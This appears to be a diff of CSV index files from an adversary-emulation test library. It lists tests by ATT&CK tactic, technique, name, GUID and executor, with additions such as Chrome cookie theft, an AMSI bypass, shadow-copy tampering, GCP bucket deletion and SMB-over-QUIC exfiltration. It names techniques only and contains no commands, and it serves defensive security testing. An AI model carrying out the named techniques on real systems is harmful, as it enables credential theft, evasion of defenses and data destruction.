 credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
+credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
@@ -1365,6 +1388,7 @@ discovery,T1087.002,Account Discovery: Domain Account,19,Suspicious LAPS Attribu
 discovery,T1087.002,Account Discovery: Domain Account,20,Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope,ffbcfd62-15d6-4989-a21a-80bfc8e58bb5,powershell
 discovery,T1087.002,Account Discovery: Domain Account,21,Suspicious LAPS Attributes Query with adfind all properties,abf00f6c-9983-4d9a-afbc-6b1c6c6448e1,powershell
 discovery,T1087.002,Account Discovery: Domain Account,22,Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd,51a98f96-0269-4e09-a10f-e307779a8b05,powershell
+discovery,T1087.002,Account Discovery: Domain Account,23,Active Directory Domain Search,096b6d2a-b63f-4100-8fa0-525da4cd25ca,sh
 discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
 discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
 discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
@@ -1393,6 +1417,7 @@ discovery,T1069.002,Permission Groups Discovery: Domain Groups,11,Get-ADUser Enu
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,14,Active Directory Enumeration with LDIFDE,22cf8cb9-adb1-4e8c-80ca-7c723dfc8784,command_prompt
+discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
 discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
 discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
 discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
@@ -1444,6 +1469,7 @@ discovery,T1082,System Information Discovery,22,WinPwn - PowerSharpPack - Seatbe
 discovery,T1082,System Information Discovery,23,Azure Security Scan with SkyArk,26a18d3d-f8bc-486b-9a33-d6df5d78a594,powershell
 discovery,T1082,System Information Discovery,24,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
 discovery,T1082,System Information Discovery,25,System Information Discovery with WMIC,8851b73a-3624-4bf7-8704-aa312411565c,command_prompt
+discovery,T1082,System Information Discovery,26,Driver Enumeration using DriverQuery,bd85e3d1-4aeb-4a1d-850f-7be3cb8d60b9,command_prompt
 discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
 discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
 discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
@@ -1551,6 +1577,7 @@ discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-
 discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
 discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
 discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
+discovery,T1046,Network Service Discovery,10,Port-Scanning /24 Subnet with PowerShell,05df2a79-dba6-4088-a804-9ca0802ca8e4,powershell
 discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
 discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
 discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
@@ -1588,6 +1615,7 @@ impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5
 impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
 impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
 impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
+impact,T1485,Data Destruction,4,GCP - Delete Bucket,4ac71389-40f4-448a-b73f-754346b3f928,sh
 impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
 impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
 impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -1597,6 +1625,7 @@ impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc
 impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
 impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
 impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
+impact,T1490,Inhibit System Recovery,10,Windows - vssadmin Resize Shadowstorage Volume,da558b07-69ae-41b9-b9d4-4d98154a7049,powershell
 impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
 impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
 impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
@@ -1617,6 +1646,7 @@ initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Accou
 initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
+initial-access,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
 initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
@@ -122,6 +122,8 @@ persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injecti
 persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
 persistence,T1136.001,Create Account: Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
+persistence,T1136.002,Create Account: Domain Account,4,Active Directory Create Admin Account,562aa072-524e-459a-ba2b-91f1afccf5ab,sh
+persistence,T1136.002,Create Account: Domain Account,5,Active Directory Create User Account (Non-elevated),8c992cb3-a46e-4fd5-b005-b1bab185af31,sh
 persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
 persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
@@ -239,6 +241,7 @@ credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,2
 credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
 credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
+discovery,T1087.002,Account Discovery: Domain Account,23,Active Directory Domain Search,096b6d2a-b63f-4100-8fa0-525da4cd25ca,sh
 discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
 discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
 discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
@@ -246,6 +249,7 @@ discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user
 discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
 discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
+discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
 discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
 discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 discovery,T1040,Network Sniffing,9,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
@@ -171,6 +171,7 @@ privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local acc
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
+credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
 credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
 credential-access,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
@@ -2,3 +2,4 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 collection,T1114.003,Email Collection: Email Forwarding Rule,1,Office365 - Email Forwarding,3234117e-151d-4254-9150-3d0bac41e38c,powershell
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,Office 365 - Set Audit Bypass For a Mailbox,c9a2f6fe-7197-488c-af6d-10c782121ca6,powershell
+persistence,T1098.002,Account Manipulation: Additional Email Delegate Permissions,1,EXO - Full access mailbox permission granted to a user,17d046be-fdd0-4cbb-b5c7-55c85d9d0714,powershell
@@ -44,6 +44,8 @@ defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8
 defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
 defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
 defense-evasion,T1564,Hide Artifacts,4,Create and Hide a Service with sc.exe,333c7de0-6fbe-42aa-ac2b-c7e40b18246a,command_prompt
+defense-evasion,T1564,Hide Artifacts,5,Command Execution with NirCmd,2748ab4a-1e0b-4cf2-a2b0-8ef765bec7be,powershell
+defense-evasion,T1562.009,Impair Defenses: Safe Boot Mode,1,Safe Mode Boot,2a78362e-b79a-4482-8e24-be397bce4d85,command_prompt
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
 defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
@@ -101,6 +103,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,9,Load Arbitrary DLL via Wua
 defense-evasion,T1218,Signed Binary Proxy Execution,10,Lolbin Gpscript logon option,5bcda9cd-8e85-48fa-861d-b5a85d91d48c,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
+defense-evasion,T1218,Signed Binary Proxy Execution,13,LOLBAS CustomShellHost to Spawn Process,b1eeb683-90bb-4365-bbc2-2689015782fe,powershell
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
@@ -182,6 +185,7 @@ defense-evasion,T1112,Modify Registry,53,Windows Auto Update Option to Notify be
 defense-evasion,T1112,Modify Registry,54,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
 defense-evasion,T1112,Modify Registry,55,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
 defense-evasion,T1112,Modify Registry,56,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
+defense-evasion,T1112,Modify Registry,57,Allow Simultaneous Download Registry,37950714-e923-4f92-8c7c-51e4b6fffbf6,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
@@ -270,6 +274,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Disable Wi
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,Delete Windows Defender Scheduled Tasks,4b841aa1-0d05-4b32-bbe7-7564346e7c76,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,44,AMSI Bypass - Override AMSI via COM,17538258-5699-4ff1-92d1-5ac9b0dc21f5,command_prompt
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
@@ -393,6 +398,7 @@ privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
+privilege-escalation,T1547.012,Boot or Logon Autostart Execution: Print Processors,1,Print Processors,f7d38f47-c61b-47cc-a59d-fc0368f47ed0,powershell
 privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
 privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
@@ -404,7 +410,8 @@ privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS
 privilege-escalation,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
-privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,2,Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry,de3f8e74-3351-4fdb-a442-265dbf231738,powershell
 privilege-escalation,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
 privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
@@ -591,6 +598,7 @@ persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service
 persistence,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
 persistence,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
 persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
+persistence,T1547.012,Boot or Logon Autostart Execution: Print Processors,1,Print Processors,f7d38f47-c61b-47cc-a59d-fc0368f47ed0,powershell
 persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1137.006,Office Application Startup: Add-ins,2,Persistent Code Execution Via Excel Add-in File (XLL),9c307886-9fef-41d5-b344-073a0f5b2f5f,powershell
@@ -611,7 +619,8 @@ persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry
 persistence,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
 persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
 persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
-persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
+persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,2,Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry,de3f8e74-3351-4fdb-a442-265dbf231738,powershell
 persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
 persistence,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -718,6 +727,7 @@ command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
+command-and-control,T1572,Protocol Tunneling,4,run ngrok,4cdc9fc7-53fb-4894-9f0c-64836943ea60,powershell
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
 command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
@@ -788,6 +798,8 @@ lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticke
 lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
 lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 lateral-movement,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
+lateral-movement,T1570,Lateral Tool Transfer,1,Exfiltration Over SMB over QUIC (New-SmbMapping),d8d13303-159e-4f33-89f4-9f07812d016f,powershell
+lateral-movement,T1570,Lateral Tool Transfer,2,Exfiltration Over SMB over QUIC (NET USE),183235ca-8e6c-422c-88c2-3aa28c4825d9,powershell
 lateral-movement,T1563.002,Remote Service Session Hijacking: RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
 lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
@@ -994,6 +1006,7 @@ discovery,T1082,System Information Discovery,20,WinPwn - PowerSharpPack - Watson
 discovery,T1082,System Information Discovery,21,WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors,efb79454-1101-4224-a4d0-30c9c8b29ffc,powershell
 discovery,T1082,System Information Discovery,22,WinPwn - PowerSharpPack - Seatbelt,5c16ceb4-ba3a-43d7-b848-a13c1f216d95,powershell
 discovery,T1082,System Information Discovery,25,System Information Discovery with WMIC,8851b73a-3624-4bf7-8704-aa312411565c,command_prompt
+discovery,T1082,System Information Discovery,26,Driver Enumeration using DriverQuery,bd85e3d1-4aeb-4a1d-850f-7be3cb8d60b9,command_prompt
 discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
 discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome / Opera Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
 discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
@@ -1066,6 +1079,7 @@ discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de
 discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
 discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
 discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
+discovery,T1046,Network Service Discovery,10,Port-Scanning /24 Subnet with PowerShell,05df2a79-dba6-4088-a804-9ca0802ca8e4,powershell
 discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
 discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
 discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
@@ -1096,6 +1110,7 @@ impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc
 impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
